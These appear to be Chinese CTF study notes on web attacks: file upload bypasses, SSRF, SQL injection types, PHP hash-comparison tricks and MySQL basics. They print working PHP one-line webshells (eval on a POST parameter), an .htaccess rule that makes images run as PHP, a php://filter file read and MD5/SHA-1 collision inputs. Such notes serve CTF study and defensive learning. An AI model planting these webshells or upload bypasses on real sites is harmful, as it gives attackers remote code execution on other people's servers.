Appearance
WEB
文件上传漏洞
常见的文件上传漏洞
- 函数
- eval
- passru
- exec
- pcntl_exec
- popen
- 方法
- 黑名单突破
- 白名单突破
- 文件头欺骗
- MIME绕过
- 解析漏洞
- 信息内容欺骗
- 绕过
- 别名绕过php、php2、pht、phtml、.xxx.php
- 大小写
- 文件头
- nginx解析回退
- 传.htaccess、.user.ini改变解析方式
实战
信息收集
- 注意key可能的加密方式,或者存在类似的文件
- waf 如何触发
伪协议
php://filter/convert.base64e-encode/resource=flag.php
一句话木马+改文件头
php
GIF89a
<script language='php'>@eval($_POST['abc']);</script> # 绕过php检测
<?php eval($_POST['abc']);?> # 一句话木马
<?php file_put_contents("trojan.php", '<?php eval($_POST["abc"]);?>');?> # 条件竞争文件马
.htaccess
AddType application/x-httpd-php jpg
AddType application/x-httpd-php png
SSRF漏洞
服务端请求伪造漏洞
由攻击者注入请求,服务端访问其他脚本的漏洞
防护
- 分离内网
- 禁止CURL的所有协议
SQL注入
判断如何注入
- 有回显
- 时间型盲注:用页面返回时间是否增加判断是否存在注入
- 基于错误的注入:页面会返回错误信息
- 无回显
- 联合查询注入:可以使用union的情况下
- 堆查询注入:可以同时执行多条语句
等号比较绕过
- md5相等
- 弱类型判断(0exx=0):
s1885207154a
,s1836677006a
- 双md5弱类型:
7r4lGXCH2Ksu2JNT3BYM
,CbDLytmyGm2xQyaLNhWn
,770hQgrBOjrcqftrlaZk
- x=md5(x):
0e215962017
- 完全相同:
- %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&
- %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
- 弱类型判断(0exx=0):
- sha1相等
- 强相等:
- %25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
- %25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
- 强相等:
- 类型判断漏洞
- php数组绕过: a[]=1,md5、sha1返回null
php 接参
extract
: url参数转变量.
和等不合法字符会转换成下划线且只转换一次
a[]=1
当做数组形式php://input
: 直接读取raw
MySQL基础知识
MySQL默认的数据库有sys、mysql、performance_schema、information_schema。information_schema存放着所有的数据库信息(5.0版本以上才有这个库)
这个库有三个表:
- SCHEMATA 该表存放用户创建的所有数据库库名
- SCHEMA_NAME 字段记录数据库库名
- TABLES 该表存放用户创建的所有数据库库名和表名
- TABLE_SCHEMA 字段记录数据库名
- TABLE_NAME 字段记录表名
- COLUMNS 该表存放用户创建的所有数据库库名、表名和字段名
- TABLE_SCHEMA 字段记录数据库名
- TABLE_NAME 字段记录表名
- COLUMN_NAME 字段记录字段名
命令执行
利用python内置类反序列化
反序列化
php和python
调用链
代码审计
看描述
node命令执行,ejs rce